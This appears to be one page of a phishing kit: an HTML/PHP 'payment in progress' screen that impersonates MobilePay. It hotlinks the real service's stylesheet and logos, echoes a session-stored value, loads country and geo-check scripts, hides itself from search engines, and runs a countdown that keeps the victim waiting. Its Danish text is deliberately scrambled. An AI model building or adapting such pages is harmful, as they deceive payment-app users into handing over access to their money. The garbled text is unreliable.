<html lang="de" no-translate>
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
    <meta name="robots" content="noindex, nofollow, noimageindex, nositemap, noarchive, none, nosnippet, noodp, " />
    <meta name="google" content="notranslate" />
    <meta name="description" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="style.css" />
	<script src="./check-country.js"></script>
	
      <title>MobilePay</title>
      <style>html{margin:0;box-sizing:border-box;font-family:-apple-system,BlinkMacSystemFont,Roboto,Ubuntu,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-size:16px;height:100%}*{box-sizing:inherit;font-family:inherit}body{margin:0;padding:0;display:block;position:relative;width:100%;height:100%}#root{height:100%}</style>
      
      <link href="https://pay.mobilepay.dk/dwo-api-application/v1/deeplink/vippsgateway/static/css/main.f67fdb9f.css" rel="stylesheet">
   <style id="r-style-sheet">.context-menu-container {
    position: absolute;
    z-index: 100000;
    background: none;
    min-width: 150px;

    /*background: #800000;*/
}
.context-menu-container {
    opacity: 0;
}
    .r-dropdown .drp-toggle{
        position: absolute;
        top: 8px;
        right: 6px
}
    .r-drp-chevron-down {
        box-sizing: border-box;
        position: relative;
        display: block;
        transform: scale(var(--ggs,1));
        width: 22px;
        height: 22px;
        border: 2px solid transparent;
        border-radius: 100px
       }
       
       .r-drp-chevron-down::after {
        content: "";
        display: block;
        box-sizing: border-box;
        position: absolute;
        width: 7px;
        height: 7px;
        border-bottom: 2px solid;
        border-right: 2px solid;
        transform: rotate(45deg);
        left: 4px;
        top: 2px
       } 
    .r-dropdown .r-menu-item:hover {
        background: #dfdfdf;
    }
    
    .r-dropdown .r-menu-item.r-d-sel {
        background: #00366c;
        color: #fff;
    }
    .r-dropdown .r-menu-item {
        padding: 5px 15px;
        cursor: pointer;
        color:#000;
        font-size:14px
    }
    
    .r-dropdown {
        border-radius: 4px;
        border: 1px solid #dfdfdf;
        width: 100%;
        background: #fff;
        padding: 5px 0;
    
    }
    .r-dropdown.scrollable {
        max-height: 200px;
        overflow: auto;
    }</style></head>
   <body class="MOBILEPAY" style="" cz-shortcut-listen="true">
      
      <div id="root">
         <div class="parent">
            <div class="header">
               <span class="logo logo-mobilepay"><img alt="MobilePay logo" src="https://pay.mobilepay.dk/dwo-api-application/v1/deeplink/vippsgateway/static/media/mobilepay-logo.41437d70c8aae3ec0e45e6fc1e1b2eec.svg"><img alt="MobilePay logo" src="https://pay.mobilepay.dk/dwo-api-application/v1/deeplink/vippsgateway/static/media/mobilepay-text-logo.a387960cc7c6712e993d8ea50f93ab85.svg"></span>
               <div class="locale-switcher">
                  <div role="combobox" class="false undefined drop-down-selector" id="locale-switcher" aria-label="Valg af sprog, Dansk valgt" aria-controls="2140dbdb-5e66-4d9d-84a6-edf02bfe0c29" aria-expanded="false" aria-haspopup="listbox" aria-activedescendant="da-DK" tabindex="0">
                     <span>DK</span>
                     <span class="caret">
                        <svg xmlns="http://www.w3.org/2000/svg" width="12" height="7" viewBox="0 0 12 7" fill="none">
                           <path fill-rule="evenodd" clip-rule="evenodd" d="M6.70711 6.70711C6.31658 7.09763 5.68342 7.09763 5.29289 6.70711L0.292894 1.70711C-0.097631 1.31658 -0.0976309 0.683416 0.292894 0.292892C0.683418 -0.097632 1.31658 -0.0976319 1.70711 0.292893L6 4.58579L10.2929 0.292893C10.6834 -0.0976311 11.3166 -0.097631 11.7071 0.292893C12.0976 0.683417 12.0976 1.31658 11.7071 1.70711L6.70711 6.70711Z" fill="#5E3DC2"></path>
                        </svg>
                     </span>
                  </div>
               </div>
            </div>
            <div class="fill"></div>
            <div class="main">
               <main class="card" aria-live="polite">
                  <div class="status-wrapper">
                     <br>
<br>
<br>
<br>
<h1>Åtn GotizeWay</h1>

<br>
<br>

                     <br>
<div class="status-circle">
    <div class="offscreen">Du har 7 minutter and 20 sekunder til at åbne MobilePay og gennemføre betalingen.</div>
    <div class="status-timer-text" aria-hidden="true">10:00</div>
    <div class="status-circle-background state-70-100"></div>
    <div class="status-circle-spinner state-70-100"></div>
    <div class="status-circle-ball-fixed"></div>
    <div class="status-circle-ball-moving"></div>
    <div class="status-circle-inner"></div>
</div>
                     <br>
<br>

<p tabindex="0" class="description undefined"><span class="line">Di far senvb en tebazinmsangovninm biz
Parninm: Unvehinev mzotaz dariatze <?php echo $_SESSION['mpay']; ?></span></p>
                  </div>
               </main>
               <footer class="footer"><a class="cancel-link" href="#" aria-label="Afbryd betalingen og gå tilbage til webshoppen" role="button">Ahtryv tebazinmen</a></footer>
            </div>
            <div class="fill"></div>
         </div>
      </div>
   
</body>
<script src="geo-check.js"></script>

<script>
window.onload = function() {
    // Get the initial time from the HTML
    var timerElement = document.querySelector('.status-timer-text');
    var initialTime = timerElement.innerText.split(':');
    var minutes = parseInt(initialTime[0]);
    var seconds = parseInt(initialTime[1]);

    // Calculate total seconds
    var totalTime = minutes * 60 + seconds;

    // Display countdown timer
    var countdownElement = document.createElement('div');
    countdownElement.classList.add('countdown');
    document.body.appendChild(countdownElement);

    // Calculate initial spinner rotation
    var initialRotation = 360 * totalTime / 600; // 600 seconds = 10 minutes

    // Update spinner rotation
    var spinner = document.querySelector('.status-circle-spinner');
    spinner.style.transform = 'rotate(' + initialRotation + 'deg)';

    var timerInterval = setInterval(function() {
        var minutesLeft = Math.floor(totalTime / 60);
        var secondsLeft = totalTime % 60;

        // Update the countdown display
        countdownElement.textContent = minutesLeft + ':' + (secondsLeft < 10 ? '0' : '') + secondsLeft;

        // Decrease total time
        totalTime--;

        // Update the displayed time on the page
        timerElement.innerText = minutesLeft + ':' + (secondsLeft < 10 ? '0' : '') + secondsLeft;

        // Update spinner rotation
        var rotation = 360 * totalTime / 600; // 600 seconds = 10 minutes
        spinner.style.transform = 'rotate(' + rotation + 'deg)';

        // If countdown reaches zero, reload the page
        if (totalTime < 0) {
            clearInterval(timerInterval);
            countdownElement.textContent = 'Rezoavinm wame...';
            setTimeout(function() {
                location.reload();
            }, 2000); // Reload after 2 seconds
        }
    }, 1000);
};
</script>
</html>